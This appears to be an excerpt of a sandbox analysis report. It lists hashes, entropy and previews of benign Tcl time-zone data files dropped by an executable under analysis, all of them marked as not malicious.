                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsVVMMvfXHAIgNGExVMeWARL/2DcBEBXCEeDcVVMMyn:SlSWB9vsM3y7VTHAIgNTxcAN/2DFSVDR
                                                                                                                                                                                                                                            MD5:5C2E2B5189E0E816D5BD7AFC8B49A35E
                                                                                                                                                                                                                                            SHA1:4E43A1ED51399528636D6442B1DDFFD820911407
                                                                                                                                                                                                                                            SHA-256:25E221BE49DEC5547A74AEB91B0041859C59BC866987272A447AB2343D1CC30C
                                                                                                                                                                                                                                            SHA-512:B74735CFAB692756BAADFB1A51A8CC0C986F981D8E7E7A8182370A9017E67439875F0115820A349AFB3BE2FA581A721440968EF817471DD2C5E1286E53B2FE99
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Nairobi)]} {.. LoadTimeZoneFile Africa/Nairobi..}..set TZData(:Africa/Mogadishu) $TZData(:Africa/Nairobi)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):208
                                                                                                                                                                                                                                            Entropy (8bit):4.8660011420394955
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2D3NPDm2OHrFGxYoHvlHIg5pTwdPsy:MB862D3NbmdHhmYCvdIg5GPsy
                                                                                                                                                                                                                                            MD5:1B3C94B5098E454981C73C1F2AF80164
                                                                                                                                                                                                                                            SHA1:1EBA9E2DBEA70BB1AE5EB13739518AB5A62D2130
                                                                                                                                                                                                                                            SHA-256:2BF0D90610211651127402680519B29AB50B15D344263D0C1A22EDEBE5E01E27
                                                                                                                                                                                                                                            SHA-512:DA4A0BCE7C6750BD7D3BA76B6301B9390723BE0C001C39BE453D80BD87020C2253A75629F68F83C19410D2A75FAF5223A435299CD4AA53DE545EC7C5B5AA54B7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Monrovia) {.. {-9223372036854775808 -2588 0 LMT}.. {-2776979812 -2588 0 MMT}.. {-1604359012 -2670 0 MMT}.. {63593070 0 0 GMT}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):277
                                                                                                                                                                                                                                            Entropy (8bit):4.655052651600954
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2Dk1Dm2OHsvT5oH99VCV22ufPnVCkVBKBQn9q:MB862DGmdHsvVCjkifvdH9q
                                                                                                                                                                                                                                            MD5:B640661FB37BB74FAB172DBDF1B433E1
                                                                                                                                                                                                                                            SHA1:0236A5B53443A4A18B8B9D6AA7732620BE9A6553
                                                                                                                                                                                                                                            SHA-256:BD8E9765174431C0D403249D3E881C949C83966E9F8162552DA88AE53132467B
                                                                                                                                                                                                                                            SHA-512:53DCC6DF7C3E0B00A6D98A8DCC4988C8CFD6B53CC89E6F8D32DA41CB532A62D9C6A823675C5039F5639CE0D423F6D571F46F5B93FFC7EFFB4EDFFBF89D46AA12
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Nairobi) {.. {-9223372036854775808 8836 0 LMT}.. {-1946168836 9000 0 +0230}.. {-1309746600 10800 0 EAT}.. {-1261969200 9000 0 +0230}.. {-1041388200 9900 0 +0245}.. {-865305900 10800 0 EAT}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):208
                                                                                                                                                                                                                                            Entropy (8bit):4.856754881865487
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2DjUfDm2OHNseoH1axCXFHzaSmkFWTvF9:MB862DjULmdHPC1XNzaS3yz
                                                                                                                                                                                                                                            MD5:EDB548348E590C8CFE04ED172D96B86C
                                                                                                                                                                                                                                            SHA1:AD3B631FB03819772164402E202AFA781687F597
                                                                                                                                                                                                                                            SHA-256:9ADA5F5AFB25E823E1F0E8AD2489AAA1C09F01356634A9403670D7AB21CA2E2C
                                                                                                                                                                                                                                            SHA-512:17E396A9BE497077B774AD1108CC8760ED35FC92F65FFF070F9ACD3C4FB67A335C1C57DF1CCB1570DE14B708EFCA0063990A969E30759C9A47731DA45ED25EFE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Ndjamena) {.. {-9223372036854775808 3612 0 LMT}.. {-1830387612 3600 0 WAT}.. {308703600 7200 1 WAST}.. {321314400 3600 0 WAT}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):178
                                                                                                                                                                                                                                            Entropy (8bit):4.871519187180041
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2DcdhA9Ff2DcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2Dsh2f2D1
                                                                                                                                                                                                                                            MD5:0134039CD1666E983A9B6E43ABD6AF59
                                                                                                                                                                                                                                            SHA1:A2A99345390F4D17C892CEADE58C604257686764
                                                                                                                                                                                                                                            SHA-256:B517120AD8DB3F21EAB4E44A78001EE856EB4EA35852C54CCA96D38887DEBCFA
                                                                                                                                                                                                                                            SHA-512:E5911ADD3D776D87ACFC986C4D2564E3ED9AB12C67F23391ED35FF2A31AD8314B873E31DB8DA4D5E0DAEA12BE34110A8F0C27C9C6126977BAD51C6AD5CDFA39B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Niamey) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):188
                                                                                                                                                                                                                                            Entropy (8bit):4.909962899502589
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2DcboGb+DcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2Dqbb+c
                                                                                                                                                                                                                                            MD5:550E482599C2F4280F2C258019BB2547
                                                                                                                                                                                                                                            SHA1:A39045BEF313094CEDC100A7D695AE51BC9E498D
                                                                                                                                                                                                                                            SHA-256:64CAF2BF9D45095DF97F419714D5617CF6300ACDB544B621DCE1D594AA9B910C
                                                                                                                                                                                                                                            SHA-512:4FD29C5B4C0D2BDE69C437E9BF4F08A11E1DAAA689B69F28F3551F550BDCCDD055E4C1A241EDB2FA48B18825AFF792F4860F55983E106EA8224F1D87ED4F7546
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Nouakchott) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):189
                                                                                                                                                                                                                                            Entropy (8bit):4.920023025906233
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2DcXCZDcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2D1DBS
                                                                                                                                                                                                                                            MD5:6CFC4E938E50C9B591F8CC42A14FA82A
                                                                                                                                                                                                                                            SHA1:FCE14A5CA62C9005C76D27B849A238E76C834F8A
                                                                                                                                                                                                                                            SHA-256:03B9C1FE350B5E9F6F333F9519FA394DCC562308D9388A903AF3D3FECEBDC762
                                                                                                                                                                                                                                            SHA-512:98F22F1D23A9930276A2D306A1473E64DC43547A16CFD01226E4F030A26A3CC4FDED77F790583CC5C078FC6DFCCE81C16A50879AE46A0D3A6F1FA98373F413C7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Ouagadougou) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):182
                                                                                                                                                                                                                                            Entropy (8bit):4.893842293207225
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqsGe/vXHAIgNGESuvHRL/2DcyTKM0DcGeyn:SlSWB9vsM3y7VXHAIgNTTN/2DQD4yn
                                                                                                                                                                                                                                            MD5:6D979FCD225D5431C7391AE568C6409F
                                                                                                                                                                                                                                            SHA1:6C9DCD222061CC00FD386773C6BB2861F3429A60
                                                                                                                                                                                                                                            SHA-256:8FB8692DB9281AE2B087D704168BFD47D3D0901781FEF65BFD62FCB213BA6B50
                                                                                                                                                                                                                                            SHA-512:32AFA6AF6BFC3D42CA636DD2B96906048EF1ADFBB135BB7E7B77C444FED99FDABB84FBBADF56EC63828FFA7B3371191FF1311822B1C75241EBD9CF602467088E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Lagos)]} {.. LoadTimeZoneFile Africa/Lagos..}..set TZData(:Africa/Porto-Novo) $TZData(:Africa/Lagos)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):234
                                                                                                                                                                                                                                            Entropy (8bit):4.818597723513168
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2DXDm2OHH5oHvzdoH1aNbbFHRMy:MB862DTmdHH5CvzdC16bZRMy
                                                                                                                                                                                                                                            MD5:28A5967C797F4B38FB63F823D6F07168
                                                                                                                                                                                                                                            SHA1:17872E91683B884191D2E4C777FB79DCE6D73EE7
                                                                                                                                                                                                                                            SHA-256:BA1D60DF2B41320F92A123A714E17E576C89383526B96E0541A464C3FBA415B7
                                                                                                                                                                                                                                            SHA-512:B335E3D3268631F3A71F4BAD59740F3A5222344E8223C201B8FE885BAA7F1A550FA7778E498D6DC2111F41053856F50B21413AECCE84B80833EC8176F2A1009C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Sao_Tome) {.. {-9223372036854775808 1616 0 LMT}.. {-2713912016 -2205 0 LMT}.. {-1830384000 0 0 GMT}.. {1514768400 3600 0 WAT}.. {1546304400 0 0 GMT}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):186
                                                                                                                                                                                                                                            Entropy (8bit):4.905303708777235
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqss1kovXHAIgNGE4pHRL/2DcHdDcsS:SlSWB9vsM3y7s3HAIgNT4pHN/2DwdDBS
                                                                                                                                                                                                                                            MD5:F2D7F7BC4EA3629EC7F0E45300A0CFD2
                                                                                                                                                                                                                                            SHA1:E7594D378C5DCFEB1E87E13AC79A026260D2E630
                                                                                                                                                                                                                                            SHA-256:9D8009ACAB019B32B1E87AB10E0AC3765ABCABE8066318DA8CA4905D41562F72
                                                                                                                                                                                                                                            SHA-512:795E58172907020C85CF0B10BBA35842D5F92872CCB3382DFDC787BAA504C79927FA23BC3104AD63541A95C44CA80977E8247846DE918A0B00963B970F4823D2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Africa/Abidjan)]} {.. LoadTimeZoneFile Africa/Abidjan..}..set TZData(:Africa/Timbuktu) $TZData(:Africa/Abidjan)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):954
                                                                                                                                                                                                                                            Entropy (8bit):4.151253074491018
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB862DrmdHrCDWR+f7Zn9ueRSmNvlTtuyI/ZBv8dq8Jw4VFZBZYEuAENSfp8kSYx:5veuDkWx3NdT18kbjjAkxTx
                                                                                                                                                                                                                                            MD5:2DF9B050D82B06EB89DA908C31C1F1C9
                                                                                                                                                                                                                                            SHA1:CB294E12560A98D5CEA3BA7004B5519B6C22BAAC
                                                                                                                                                                                                                                            SHA-256:B447B6B1C351E77F22A2D77C0437F2BBB7D8BDFDFDC3D6285E0D260519CC7110
                                                                                                                                                                                                                                            SHA-512:BBE281D551E9F8DA7B6BB08D809177615410A11E4B1184ABD220EA8B1F355B2BBC090C6BAAF7E07FD61286891388ECD4026D4433C4E4B6A8D201F8D95E174532
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Tripoli) {.. {-9223372036854775808 3164 0 LMT}.. {-1577926364 3600 0 CET}.. {-574902000 7200 1 CEST}.. {-512175600 7200 1 CEST}.. {-449888400 7200 1 CEST}.. {-347158800 7200 0 EET}.. {378684000 3600 0 CET}.. {386463600 7200 1 CEST}.. {402271200 3600 0 CET}.. {417999600 7200 1 CEST}.. {433807200 3600 0 CET}.. {449622000 7200 1 CEST}.. {465429600 3600 0 CET}.. {481590000 7200 1 CEST}.. {496965600 3600 0 CET}.. {512953200 7200 1 CEST}.. {528674400 3600 0 CET}.. {544230000 7200 1 CEST}.. {560037600 3600 0 CET}.. {575852400 7200 1 CEST}.. {591660000 3600 0 CET}.. {607388400 7200 1 CEST}.. {623196000 3600 0 CET}.. {641775600 7200 0 EET}.. {844034400 3600 0 CET}.. {860108400 7200 1 CEST}.. {875919600 7200 0 EET}.. {1352505600 3600 0 CET}.. {1364515200 7200 1 CEST}.. {1382662800 7200 0 EET}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1111
                                                                                                                                                                                                                                            Entropy (8bit):4.150944563639585
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB862DHmdHjCvbB/lxRjntMVyoKCyFWeey0XSe/OSyHaCgmvLOcSFQSFeSTC6ZPJ:5LemvbplxRhbv+yuh2tIee6kvcw9Cy
                                                                                                                                                                                                                                            MD5:0C99335A41D33AA8BC1EDA0CB4CDCBF5
                                                                                                                                                                                                                                            SHA1:5CABC28D318FA5B8307429EA571FFF91EB8E1252
                                                                                                                                                                                                                                            SHA-256:0760D1028E733888E43E7F1E057217DC2B52786029FCEC67B27EB69CC6A54938
                                                                                                                                                                                                                                            SHA-512:C8FE685ACA46FD4836F3AABC15833F294E5EBED123A487D04E74A8C5668BDFAFB96D2326760452A6E5A1B9CC25AC6C3918D8C10A7F8EF737456640E3000BBA2F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Tunis) {.. {-9223372036854775808 2444 0 LMT}.. {-2797202444 561 0 PMT}.. {-1855958961 3600 0 CET}.. {-969242400 7200 1 CEST}.. {-950493600 3600 0 CET}.. {-941940000 7200 1 CEST}.. {-891136800 3600 0 CET}.. {-877827600 7200 1 CEST}.. {-857257200 3600 0 CET}.. {-844556400 7200 1 CEST}.. {-842918400 3600 0 CET}.. {-842223600 7200 1 CEST}.. {-828230400 3600 0 CET}.. {-812502000 7200 1 CEST}.. {-796269600 3600 0 CET}.. {-781052400 7200 1 CEST}.. {-766634400 3600 0 CET}.. {231202800 7200 1 CEST}.. {243903600 3600 0 CET}.. {262825200 7200 1 CEST}.. {276044400 3600 0 CET}.. {581122800 7200 1 CEST}.. {591145200 3600 0 CET}.. {606870000 7200 1 CEST}.. {622594800 3600 0 CET}.. {641516400 7200 1 CEST}.. {654649200 3600 0 CET}.. {1114902000 7200 1 CEST}.. {1128038400 3600 0 CET}.. {1143334800 7200 1 CEST}.. {1162083600 3600 0 CET}.. {11747
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1649
                                                                                                                                                                                                                                            Entropy (8bit):3.9974091170263066
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5t+Lmcz0iMHHWMbnHoMcHiM0H+MCySHr/MDHqMafHO8MwHJMHHOMHSHWMHHXM5Hs:OLjQDI6jZ2WFcv
                                                                                                                                                                                                                                            MD5:4846FB13467BA93EB134D88228D7F534
                                                                                                                                                                                                                                            SHA1:477FC6144B7DF365606A2E44EF1430F8DF6FB841
                                                                                                                                                                                                                                            SHA-256:DFC3D1FC182B315B31D999BC103C264BD205EB16F971C8636003A71170D7BD7C
                                                                                                                                                                                                                                            SHA-512:A719F5083F66CE44FE047880A10B2ED04B66E01C7F0F7DADAE2FFB95172308F091D669BCFED5A236D2A0F80A4A1D78DA7A778DDE3FAECB40170ECDA705573769
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Africa/Windhoek) {.. {-9223372036854775808 4104 0 LMT}.. {-2458170504 5400 0 +0130}.. {-2109288600 7200 0 SAST}.. {-860976000 10800 1 SAST}.. {-845254800 7200 0 SAST}.. {637970400 7200 0 CAT}.. {764200800 3600 1 WAT}.. {778640400 7200 0 CAT}.. {796780800 3600 1 WAT}.. {810090000 7200 0 CAT}.. {828835200 3600 1 WAT}.. {841539600 7200 0 CAT}.. {860284800 3600 1 WAT}.. {873594000 7200 0 CAT}.. {891734400 3600 1 WAT}.. {905043600 7200 0 CAT}.. {923184000 3600 1 WAT}.. {936493200 7200 0 CAT}.. {954633600 3600 1 WAT}.. {967942800 7200 0 CAT}.. {986083200 3600 1 WAT}.. {999392400 7200 0 CAT}.. {1018137600 3600 1 WAT}.. {1030842000 7200 0 CAT}.. {1049587200 3600 1 WAT}.. {1062896400 7200 0 CAT}.. {1081036800 3600 1 WAT}.. {1094346000 7200 0 CAT}.. {1112486400 3600 1 WAT}.. {1125795600 7200 0 CAT}.. {1143936000 3600 1 WAT}.. {1157245200 7200
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8447
                                                                                                                                                                                                                                            Entropy (8bit):3.867931581740766
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:6hvOs5vveFaHU6lgqN/zNMkixlrxYTMcmo1LWF59:6hvOstgqN/zNMkArxiZmf
                                                                                                                                                                                                                                            MD5:DF52E726B33FA47EB115C1233614E101
                                                                                                                                                                                                                                            SHA1:26B0E49022FCB929F0160617F9C9D2DBEDC63610
                                                                                                                                                                                                                                            SHA-256:77231D179260C08690A70AEE6C2517E4B621ED4794D9AEEA7040539F4FF05111
                                                                                                                                                                                                                                            SHA-512:48AAF25419E07B06E076B0E19F9A0C27EB257556E62FD8F7B2AA963A817823DD89D33AB6AFEAAC2EF2230361D76776355E19CC2BBBB4D19536F823A347AC8AA4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Adak) {.. {-9223372036854775808 44002 0 LMT}.. {-3225223727 -42398 0 LMT}.. {-2188944802 -39600 0 NST}.. {-883573200 -39600 0 NST}.. {-880196400 -36000 1 NWT}.. {-769395600 -36000 1 NPT}.. {-765374400 -39600 0 NST}.. {-757342800 -39600 0 NST}.. {-86878800 -39600 0 BST}.. {-31496400 -39600 0 BST}.. {-21466800 -36000 1 BDT}.. {-5745600 -39600 0 BST}.. {9982800 -36000 1 BDT}.. {25704000 -39600 0 BST}.. {41432400 -36000 1 BDT}.. {57758400 -39600 0 BST}.. {73486800 -36000 1 BDT}.. {89208000 -39600 0 BST}.. {104936400 -36000 1 BDT}.. {120657600 -39600 0 BST}.. {126709200 -36000 1 BDT}.. {152107200 -39600 0 BST}.. {162392400 -36000 1 BDT}.. {183556800 -39600 0 BST}.. {199285200 -36000 1 BDT}.. {215611200 -39600 0 BST}.. {230734800 -36000 1 BDT}.. {247060800 -39600 0 BST}.. {262789200 -36000 1 BDT}.. {278510400 -39600 0 BST}.. {29423880
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8685
                                                                                                                                                                                                                                            Entropy (8bit):3.9620252256806845
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:esKLO6KLC9+j1giaJCUbtp0nFI+g/iexpCVaBnNnt61nctE1:etLhN9DiaJCUbPI+D/iMpCIBSuk
                                                                                                                                                                                                                                            MD5:BFEACEA04AAA8A69A9AC71CF86BCC15C
                                                                                                                                                                                                                                            SHA1:1693971B8AAA35021BA34799FB1B9FADC3DA0294
                                                                                                                                                                                                                                            SHA-256:DE7FBE2B3ED780C6B82099E1E249DD41F4452A3ADB9DD807B1D0EC06049C2302
                                                                                                                                                                                                                                            SHA-512:E94112A2A5F268C03C58CE3BB4C243B2B9B0FC17CB27FDD58BCD2CCC8D377B805C87A552AE7DE1C5698C5F2C4B0FCAB00A3420B1DAD944C1A2F7A47CE7118F78
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Anchorage) {.. {-9223372036854775808 50424 0 LMT}.. {-3225223727 -35976 0 LMT}.. {-2188951224 -36000 0 AST}.. {-883576800 -36000 0 AST}.. {-880200000 -32400 1 AWT}.. {-769395600 -32400 1 APT}.. {-765378000 -36000 0 AST}.. {-86882400 -36000 0 AHST}.. {-31500000 -36000 0 AHST}.. {-21470400 -32400 1 AHDT}.. {-5749200 -36000 0 AHST}.. {9979200 -32400 1 AHDT}.. {25700400 -36000 0 AHST}.. {41428800 -32400 1 AHDT}.. {57754800 -36000 0 AHST}.. {73483200 -32400 1 AHDT}.. {89204400 -36000 0 AHST}.. {104932800 -32400 1 AHDT}.. {120654000 -36000 0 AHST}.. {126705600 -32400 1 AHDT}.. {152103600 -36000 0 AHST}.. {162388800 -32400 1 AHDT}.. {183553200 -36000 0 AHST}.. {199281600 -32400 1 AHDT}.. {215607600 -36000 0 AHST}.. {230731200 -32400 1 AHDT}.. {247057200 -36000 0 AHST}.. {262785600 -32400 1 AHDT}.. {278506800 -36000 0 AHST}.. {294235200 -3
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):202
                                                                                                                                                                                                                                            Entropy (8bit):4.908728298285591
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290/8J5290ppv:MByMYbpwt290/8m90b
                                                                                                                                                                                                                                            MD5:1C3CE9F156ABECEAA794E8F1F3A7ADDB
                                                                                                                                                                                                                                            SHA1:6F84D0A424FD2DE85E3420EA320A186B277B0295
                                                                                                                                                                                                                                            SHA-256:F38610019C0A2C18AC71F5AA108B9647D9B5C01DCB55211AFB8312308C41FE70
                                                                                                                                                                                                                                            SHA-512:CA2DA6F9551E4DBF775D7D059F6F3399E0C4F2A428699726CD2A1B0BB17CCF5CDEEF645EE1759A2A349F3F29E0343600B89CE1F4659CF5D2B58280A381C018AD
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Anguilla) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):201
                                                                                                                                                                                                                                            Entropy (8bit):4.898881450964165
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290//MFe90ppv:MByMYbpwt290//V90b
                                                                                                                                                                                                                                            MD5:DB16FFE76D625DEC731AB6320F5EF9BF
                                                                                                                                                                                                                                            SHA1:D286994E03E4F82C08DE094B436FA098648AFADE
                                                                                                                                                                                                                                            SHA-256:561E58E11DC5A86CAE04B5CB40F43EFCFF9ABC0C841FAC094619E9C5E0B403F8
                                                                                                                                                                                                                                            SHA-512:8842B616205378AF78B0B2FC3F6517385845DE30FFD477A21ACFA0060D161FB6462A3C266DCFD54F101729446B8E1B2ECF463C9CF2E6CE227B2628A19AF365F9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Antigua) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1782
                                                                                                                                                                                                                                            Entropy (8bit):3.733307964154526
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5KChlvEw6kSSx5H4a8tf3fkuozd23t8VZDG8+GCRRRd:QIlvEwJSSxdF8tfMuozdCt8VZy8+GCRB
                                                                                                                                                                                                                                            MD5:9B01680A362EA7B462DC236F6A35E14C
                                                                                                                                                                                                                                            SHA1:456A5E771F6B749BFDB2BFD59836A6A930499881
                                                                                                                                                                                                                                            SHA-256:B1327CBEC20A21E3FF873E28A2EDFA271EE3A5C01933779300EABD6B185DA010
                                                                                                                                                                                                                                            SHA-512:E6C2F5C489BEA31B0AAC3CB1DB750AC2B665DAC0AC82C1CE6756E768305300297BA5E3B32EDEB9E1715452F02223E47674C4F2B1844920F664623C9F34309240
                                                                                                                                                                                                                                            Malicious:false
